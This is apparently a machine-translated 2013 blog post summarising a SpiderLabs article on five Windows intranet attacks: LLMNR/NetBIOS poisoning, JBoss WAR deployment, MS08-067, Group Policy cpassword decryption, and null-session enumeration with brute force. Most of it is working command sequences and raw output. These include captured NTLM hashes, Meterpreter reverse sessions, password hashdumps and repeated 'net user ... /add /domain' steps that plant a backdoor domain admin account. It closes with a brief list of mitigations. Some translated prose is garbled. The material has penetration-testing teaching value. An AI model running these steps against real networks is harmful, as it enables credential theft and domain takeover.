Mickey · 2013/09/26″
From:blog.spiderlabs.com/2013/09/top…
Spiderlabs summed it up, and I’ll translate it briefly, with a little whining.
1.Netbios and LLMNR Name Poisoning
This method is very useful to infiltrate under WIN workgroups. WIN requests are queried in the following three steps: the local hosts file (%windir%\System32\drivers\etc\hosts), the DNS server, the NetBIOS broadcast, and if the first two requests fail, the NetB is sent locally IOS broadcasts the request, which any local network system can answer, using SpiderLabs’ Responder tool, which can respond to the request without ARP spoofing. Actually metasploit also can use (www.packetstan.com/2011/03/nbn.) Responder is the Responder for the Responder test. The Responder is the Responder for the Responder test
Py -i 192.168.8.25 NBT Name Service/LLMNR Answerer 1.0. Please send bugs/comments to:[email protected]To kill this script hit CRTL-C [+]NBT-NS & LLMNR responder started Global Parameters set: Challenge set is: 1122334455667788 WPAD Proxy Server is:OFF HTTP Server is:ON HTTPS Server is:ON SMB Server is:ON SMB LM support is set to:0 SQL Server is:ON FTP Server is:ON DNS Server is:ON LDAP Server is:ON FingerPrint Module is:OFF LLMNR poisoned Answer sent to this IP: 192.168.8.112. The requested name was: wpad. LLMNR Poisoned answer sent to this IP: The requested name was: wpad. LLMNR Poisoned answer sent to this IP: 192.168.8.12. The requested name was: 110. "... NBT-NS Answer Sent to: 192.168.8.6 [+] SMB-NTLmv2 Hash Captured from: 192.168.8.6 Domain is: BEACONHILLSHIGH User is: smccall [+]SMB complete hash is : smccall::BEACONHILLSHIGH:1122334455667788:reallylonghash Share requested: \ \ ECONOMY309 \ IPC $... snip... LLMNR Poisoned answer sent to this IP: 192.168.8.11. The requested name was: wpad. [+] SMB-NTLmv2 Hash captured from: Domain is: BEACONHILLSHIGH User is: lmartin [+]SMB complete Hash is: lmartin:: BEACONHILLSHIGH: 1122334455667788: reallylonghash Share requested: \ \ ADVCHEM \ 311 ipc $... "...Copy the codeThe LM, NTLMv1, or NTLMv2 hashes can be brute force cracked with GPU or rainbow table. If you have caught a domain administrator account during the responder session, you can run cmd.exe directly using winexe
~/work/nmap# ~/SpiderLabs/ winexe-pth-u BEACONHILLSHIGH\\smccall%allison --uninstall --system //192.168.8.6 cmd.exe Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ Windows \ System32 > Net User Twadmin $piD3rsRul3! /add /domain net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully. C:\WINDOWS\system32> net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully.Copy the code2. Exploit the JBoss vulnerability
The auxiliary module of Metasploit can use nmap to scan ports to identify common JAVA application servers. Take the JBoss bug. Is one of the most common weak passwords, similarly, also can find webloigc, websphere, tomcat, such as those based on JAVA application server, and more recently domestic government departments to deploy more Apusic, but need to pay attention to the war package format into the background, directly deployed war. In addition to the jboss There’s a weak password, a backstage bypass, and the old 1337. The use case describes how to use Metasploit to brute force crack the JBoss background and deploy the WAR package.
msfcli auxiliary/scanner/http/dir_scanner THREADS=25 RHOSTS=file:./8080 DICTIONARY=./http.scan.list RPORT=8080 E >> [*] Initializing modules HTTP. Jboss.8080 ~/work/nmap# cat http.jboss. THREADS => 25 RHOSTS => file:./8080 DICTIONARY => ./http.scan.list RPORT => 8080 [*] Detecting error code [*] Detecting Error code Detecting Error code [*] Using code '404' as not found for 192.168.5.18 [*] Using code '404' as not found for 192.168.5.21 [*] Using code '404' as not found for 192.168.5.20 [*] found http://192.168.5.20:8080/web-console/ 401 (192.168.5.20) [*] http://192.168.5.20:8080/web-console/ the requires authentication: The Basic realm = "JBoss JMX Console" [*] Found 404 (192.168.5.20) [*] Found at http://192.168.5.20:8080/web-console/ http://192.168.5.20:8080/jmx-console/ 401 (192.168.5.20) [*] http://192.168.5.20:8080/jmx-console/ the requires authentication: The Basic realm = "JBoss JMX Console" [*] Found http://192.168.5.21:8080/jmx-console/ 404 (192.168.5.21) [*] Scanned 4 of 4 hosts (100% complete) [*] Auxiliary module execution completed Output from use auxiliary/scanner/http/jboss_vulnscan: [*] 192.168.5.20:8080 /jmx-console/HtmlAdaptor requires Authentication (401): Basic Realm ="JBoss JMX Console" [*] 192.168.5.20:8080 Check for Verb tampering (HEAD) [+] 192.168.5.20:8080 Got Authentication bypass via HTTP verb tampering [+] 192.168.5.20:8080 Authenticated using admin:admin [+] 192.168.5.20:8080 /status does not require authentication (200) [+] 192.168.5.20:8080 /web-console/ serverinfo.jsp does Not require authentication (200) [+] 192.168.5.20:8080 /web-console/Invoker does not require authentication (200) [+] 192.168.5.20:8080 / invoker/JMXInvokerServlet does not require authentication (200), the Output from use exploit/multi/http/jboss_maindeployer: [*] Started reverse handler on 192.168.5.233:4444 [*] Sorry, automatic target detection doesn't work with HEAD requests [*] Automatically selected target "Java Universal" [*] Starting up our web service on http://192.168.5.233:1337/HlusdqEcokvXH.war... [*] Using URL: 192.168.5.233 http:// : 1337 / HlveuqEzrovXH. War [*] have the JBoss server to deploy (via MainDeployer) http://192.168.5.233:1337/HlusdqEcokvXH.war [*] Sending the WAR archive to the server... [*] Sending the WAR archive to the server... [*] Waiting for the server to request the WAR archive.... [*] Shutting down the web service... [*] Executing HlusdqEcokvXH... [+] Successfully triggered payload at '/HlusdqEcokvXH/ewNYTEdFnYdcaOl.jsp' [*] Undeploying HlusdqEcokvXH... [*] Sending stage (30355 bytes) to 192.168.5.159 [*] Meterpreter session 1 Opened (192.168.5.233:4444 -> At 2013-09-15 19:00:06-0600 meterpreter > sysinfo Computer: Windows 2003 5.2 (x86) Meterpreter Java/Java meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\DELLBAC\EJBContainer\bin>whoami whoami beaconhillshigh\backup_admin C:\>net user twadmin $piD3rsRul3! /add /domain net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully. C:\>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain beaconhillshigh.edu. The command completed successfully.Copy the code3.MS08-067
This vulnerability is more than 4 years old, but there are still many machines in the Intranet that are not patched, affecting the following (Windows Server 2000, Windows Server 2003, And Windows XP), but to tell the truth, I rarely use MS08-067 in the process of Intranet penetration, because overflow is not good, may cause DOS, be found, not good, you know.
Nmap --script=smb-check-vulns. nse-v-v-p 445,139-il smb-oa MS08 less MS08. Nmap --script=smb-check-vulns. nse-v-v-p 445,139-il smb-oa MS08 less MS08. snip... Nmap Scan Report for Shelob-squared (192.168.1.103) Host is up (0.00042s latency). Scanned at 2013-09-16 21:52:32 CDT for 55s PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 00:0C:29:E3:25:78 (VMware) Host script results: | smb-check-vulns: | MS08-067: VULNERABLE <--bingo.. There are leaks in | Conficker: Likely CLEAN | SMBv2 DoS (CVE - 2009-3103) : NOT VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive) ... snip...Copy the codeNmap NSE script is written in LUA language, and it is very helpful for penetration, especially on LINUX platform,win platform except for several scanning methods can not be used,NSE script can still be used, but LINUX default installation of nMAP version is relatively low, you can not directly put NSE directory Last time I looked at Wooyun Drops,[email protected], it said that nSE also implemented one. I just want to say, can you secretly send me a copy?
Next, use metasploit overflow. I don’t know how it works in Chinese system
MSF > use Windows/SMB/MS08_067_netapi MSF exploit(MS08_067_netapi) > set RHOST 192.168.1.103 RHOST => 192.168.1.103 MSF Exploit (MS08_067_netapi) > set TARGET 0 TARGET => 0 MSF exploit(MS08_067_netAPI) > set LHOST 192.168.1.215 LHOST => 192.168.1.215 MSF exploit(MS08_067_netAPI) > Set PAYLOAD Windows /meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (AlwaysOn NX) [*] Attempting to trigger the vulnerability... [*] Sending stage (752128 bytes) to 192.168.1.103 [*] Meterpreter session 1 Opened (192.168.1.215:33354 -> 192.168.1.103:4444) at 2013-09-16 21:54:15-0500 Meterpreter > getSystem... got system (via technique 1). meterpreter > sysinfo Computer : SHELOB-SQUARED OS : Windows XP (Build 2600, Service Pack 2). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 48c76bfa334c4c21edd1154db541c2c2... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... Frodo:"what do i have" Samwise:"Frodo" Stryder:"love" Legolas:"favorite saying" Gimli:"what am i" Boromir:"what I am" Gandalf:"moria" [*] Dumping password hashes... Administrator:500:f75d090d8564fd334a3b108f3fa6cb6d:3019d5d61cdf713c7b677efefc22f0e5::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:7e8a50750d9a1a30d3d4a83f88ea86ab:6fba9c0f469be01bab209ee2785a818d::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:861165412001ece0a5e73ab8863129d8::: Frodo:1003:74052b0fb3d802a3be4db4ed34a95891:a7cee25799f518f9bd886683a13ed6d0::: Samwise:1004:aad3b435b51404eeaad3b435b51404ee:7dff81410af5e2d0c2b6e54a98a8f622::: Stryder:1005:825f8bc99c2a5013e72c57ef50f76a05:1047f0b952cfbffbdd6c34ef6bd610e5::: Legolas:1006:625d787db20f1dd8aad3b435b51404ee:cc5b9f225e569fa3a2534be394df531a::: Gimli:1007:aad3b435b51404eeaad3b435b51404ee:e4d2534368ff0f1cbe2a42c5d79b9818::: Boromir:1008:e3bee25ac9de68cec2cc282901fd62d9:4231db4c15025d1951f3c0d39d8656a2::: Gandalf:1009:20ef2c7725e35c1dbd7cfc62789a58c8:02d0a4d2b6c7d485a935778eb90e0446::: Meterpreter > shell Process 2708 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ WINDOWS\system32>whoami whoami MIRKWOOD\Gandalf C:\WINDOWS\system32>net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully. C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully.Copy the code4. GPO cpassword
This principle can see sleepy dragon drops.wooyun.org/papers/576 cattle translation, this article is from LINUX connected to WIN, he has many students won’t WIN with LINUX osmosis domain, especially in get a WEBSHELL, or ROOT, or with a network attached to, In the case of a domain user (=.= where in the real world there are so many good conditions for you to encounter)
Smbclient -w MIRKWOOD -u 'Legolas%orcs' \\\\192.168.1.105\\SYSVOL <-- Use smbClient to connect, Domain=[MIRKWOOD] OS=[Windows Server 2008 R2 Standard 7600] Server=[Windows Server 2008 R2 Standard 6.1] SMB: \> dir . D 0 Wed Sep 15 15:08:37 2012 .. D 0 Wed Sep 15 15:08:37 2012 mirkwood.local D 0 Wed Sep 15 15:08:37 2012 48457 blocks of size 4194304. 44175 blocks available smb: \> cd mirkwood.local\ smb: \smirkwood.local\> dir . D 0 Wed Sep 15 15:13:05 2012 .. D 0 Wed Sep 15 15:13:05 2012 Policies D 0 Tue Oct 30 10:29:31 2012 scripts D 0 Thu Nov 8 12:50:21 2012 smb:\> recurse SMB :\> Prompt off SMB :\> mget Policies... "... Getting File \mirkwood\Policies\PolicyDefinitions\access32.admx of size 98874 as access32.admx (3657.0 KiloBytes/ SEC) Getting File \ mirkwood \Policies\PolicyDefinitions\access34.admx of size 131924 as (Average 3657.0 KiloBytes/ SEC Access34. admx (27324.5 KiloBytes/ SEC) (average 7038.2 KiloBytes/ SEC) Getting File \ mirkwood \ Policies \ PolicyDefinitions \ ActiveXInstallService admx of size 7217 as ActiveXInstallService admx (2303.1 KiloBytes/SEC) (Average 6722.5 KiloBytes/ SEC) Getting File \ Mirkwood \Policies\PolicyDefinitions\ addrmvprograms. admx of size 7214 as AddRmvPrograms. Admx (2301.6 KiloBytes/ SEC) (average 6446.2 KiloBytes/ SEC) Getting File \ Mirkwood \Policies\PolicyDefinitions\asdf.admx of size 4249 as asdf.admx (122.0 KiloBytes/ SEC) (average 4940.4 KiloBytes/ SEC) Getting File \ mirkwood \Policies\PolicyDefinitions\AppCompat. Admx of size 4893 as AppCompat. Admx (2633.2 KiloBytes/ SEC) (Average 4835.6 KiloBytes/ SEC) Getting File \ mirkwood \Policies\PolicyDefinitions\ attachmtmgr.admx of size 3865 as Attachmtmgr.admx (2912.5 KiloBytes/ SEC) (average 4752.0 KiloBytes/ SEC) Getting File \ Mirkwood \Policies\PolicyDefinitions\ Autoplay. admx of Size 5591 as Autoplay. admx... "... SMB :\> recurse SMB :\> Prompt off SMB :\> mget scripts... "... smb: \avi\> mget scripts Get directory scripts? y Get directory bin? y Get file #INCLUDE.BAT? Y getting file \ mirkwood \scripts\bin\# include. BAT of size 2839 as # include. BAT (409.6 KiloBytes/ SEC) (average 409.7 BAT of size 1438 as netlogon.bat (28.9 KiloBytes/ SEC) getting file \ mirkwood \scripts\bin\ netlogon.bat of size 1438 as netlogon.bat (28.9 KiloBytes/ SEC) Get file \ mirkwood \scripts\bin\ netlogon2.bat of size 16781 as netlogon2.bat (691.0) KiloBytes/ SEC) (average 566.0 KiloBytes/ SEC) getting file \ mirkwood \scripts\bin\ netlogon3. BAT of size 16486 as Netlogon3.bat (1268.5 KiloBytes/ SEC) (average 773.6 KiloBytes/ SEC) getting file \ mirkwood \scripts\bin\ netlogon4.bat of Size 17429 as netlogon4.bat (1108.7 KiloBytes/ SEC) (average 858.8 KiloBytes/ SEC)... "...Copy the codeOnce the files are downloaded, grep through both policies and scripts for Administrator or cpassword (either would work in this instance):
~/work/nmap/192.168.1.0-24/ Policies# grep -ri administrator. ./{FC71D7SS-51E2-4B9D-B261-GB8C9733D433}/Machine/Preferences/Groups/Groups.xml: :<Groups clsid="{3125E277-EB16-4b4c-6534-544FC6D24D26}"><User clsid="{HH5F1654-51E6-4d24-9B1A-D9BFN34BA1D1}" name="Administrator (built-in)" image="2" changed="2012-12-30 12:47:25" uid="{8E2D5E22-E914-438F-SS5D-FDDA92925BB7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="" description="" cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>Copy the codeThe cpassword is taken and run through the decryption script from http://carnal0wnage.attackresearch.com/2012/10/group-policy-preferences-and-getting.html.
~/work# ruby decrypt.rb <-- decrypt Local*P4ssword! ~ / work/nmap# ~ / SpiderLabs/winexe - PTH -u MIRKWOOD \ \ 'Local Administrator % * P4ssword! '--uninstall --system //192.168.1.103 cmd.exe <-- winexe Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully. C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully.Copy the code5.NetBIOS Null Enumeration Allowed on Server
In other words, the domain server allows you to connect to an empty session, then enumerate the account information, then iterate over the user with Enum4Linux.pl under LINUX, hack the account with medUSA, and execute the command with winexec. What chapter have you seen in < Hacker Exposed >?
~ / enum4linux. Pl -u MIRKWOOD Legolas - p orcs - w - a 192.168.1.90 > > enum - 192.168.1.90 ~ / work/the targets / 192.168.1.0-24 # cat Enum - 192.168.1.90 Starting enum4linux v0.8.7 (http://labs.portcullis.co.uk/application/enum4linux/) on Tue Sep 10 10:15:14 2013 ========================== | Target Information | ========================== Target ........... 192.168.1.90 rids Range... 0-1050, 500-550100 the Username... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, None = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = | Enumerating Workgroup/Domain on 192.168.1.90 | =================================================== [+] Got domain/workgroup name: MIRKWOOD = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = | Nbtstat Information for 192.168.1.90 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = & up the status of 192.168.1.90 MODOR 00 < > -m Workstation Service MIRKWOOD <00> - M Domain/Workgroup Name MIRKWOOD <1c> - M Domain Controllers MORDOR <20> - M File Server Service MAC Address = B5 - AD - 4-2 f - 37-2 g f = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = | Session Check on 192.168.1.90 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = [+] Server 192.168.1.90 allows sessions using the username ", "" '... "... = = = = = = = = = = = = = = = = = = = = = = = = = = = = | Users on 192.168.1.90 | = = = = = = = = = = = = = = = = = = = = = = = = = = = = index: 0 x2b76 RID: 0 xd08 acb: 0x00000610 Account: Administrator Name: Administrator Desc: (null) index: 0x1822 RID: 0xb0a acb: 0x00000414 Account: Frodo Name: Frodo Baggins Desc: (null) index: 0x1bga RID: 0xc0a acb: 0x00080210 Account: Samwise Name: Samwise Gamgee User Desc: (null) index: 0x1dc4 RID: 0xc7a acb: 0x00050210 Account: Stryder Name: Aragorn User Desc: (null) index: 0x1823 RID: 0xb0b acb: 0x00007014 Account: Legolas Name: Legolas Greenleaf Desc: (null) index: 0x1824 RID: 0xb0c ACb: 0x00010014 Account: Gimli Name: Gimli son of Gloin Desc: (null) index: 0x1825 RID: 0xB0d ACb: 0x00010014 Account: Gimli Name: Gimli son of Gloin Desc: (null) index: 0x1825 RID: 0xB0d ACb: 0x00300014 Account: Boromir Name: Boromir son of Denethor II Desc: (null) index: 0x126f RID: 0x9eb acb: 0x00004014 Account: Gandalf Name: Gandalf the Gray Desc: (null) index: 0x1826 RID: 0xb0e acb: 0x00020015 Account: Gollum Name: gollum Desc: (null)... "... ~ / work/the targets / 192.168.1.90 # cat enum - 192.168.1.90. TXT | grep "Domain Admins" Group 'Administrators' (rids: 544) has member: MIRKWOOD\Domain Admins Group:[Domain Admins] rid:[0x200] Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Gandalf Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Stryder Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Administrator Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \gollum Group 'Domain Admins' (RID: 512) has member: MIRKWOOD \Saruman S-1-5-21-8675309254-522963170-1866889882-512 MIRKWOOD \Domain Admins (Domain Group) S-1-5-21-1897573695-8675309227-1212564242-512 MORDOR\Domain Admins (Domain Group) ~/work/nmap/# medusa -M smbnt -H smb -u gollum -p gollum -m GROUP:DOMAIN | tee smb-gollum.medusa ACCOUNT CHECK: [smbnt] Host: User: gollum (1 of 1, 0 complete) Password: Gollum (1 of 1 complete) ACCOUNT FOUND [SMBNT] Host: 192.168.1.1 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [SMBNT] Host: 192.168.1.100 (2 of 62, 1 complete) Gollum (1 of 1 complete) ACCOUNT FOUND: [SMBNT] Host: 192.168.1.100 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [smbnt] Host: 192.168.1.105 (3 of 62, 2 complete) User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) [SMBNT] Host: 192.168.1.105 User: gollum Password: gollum [SUCCESS] ACCOUNT CHECK: [SMBNT] Host: User: gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [SMBNT] Host: 192.168.1.106 User: gollum Password: gollum [SUCCESS (0x000072:STATUS_ACCOUNT_DISABLED)] ACCOUNT CHECK: [SMBNT] Host: 192.168.1.107 (5 of 62, 4 complete) User: ssadmin (1 of 1, 0 complete) Gollum (1 of 1 complete) ACCOUNT FOUND: [SMBNT] Host: 192.168.1.107 User: gollum Password: Gollum [SUCCESS] ACCOUNT CHECK: [SMBNT] Host: 192.168.1.11 (7 of 62, 6 complete) Gollum (1 of 1, 0 complete) Password: gollum (1 of 1 complete) ACCOUNT FOUND: [SMBNT] Host: 192.168.1.11 User: Gollum Password: gollum [SUCCESS]... "... ~/work/nmap# ~/SpiderLabs/ winexe-pth-u MIRKWOOD\\gollum%gollum --uninstall --system //192.168.1.106 cmd.exe Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\ Windows \ System32 >whoami whoami MIRKWOOD\ Gollum C:\WINDOWS\system32>> net user twadmin $piD3rsRul3! /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully. C:\WINDOWS\system32>net group "Domain Admins" twadmin /add /domain net group "Domain Admins" twadmin /add /domain The request will be processed at a domain controller for domain MIRKWOOD. The command completed successfully.Copy the codeFix method :[really do not want the administrator to see]
1. Use XP/ Win2K less, otherwise Netbios and LLMNR Name Poisoning are rarely completely banned for compatibility
2. Download the software installation program from a well-known site and change the default password of the software
3. Install system-wide patches diligently
4. Do account audits
5. Disable empty sessions, allocate vlans for key servers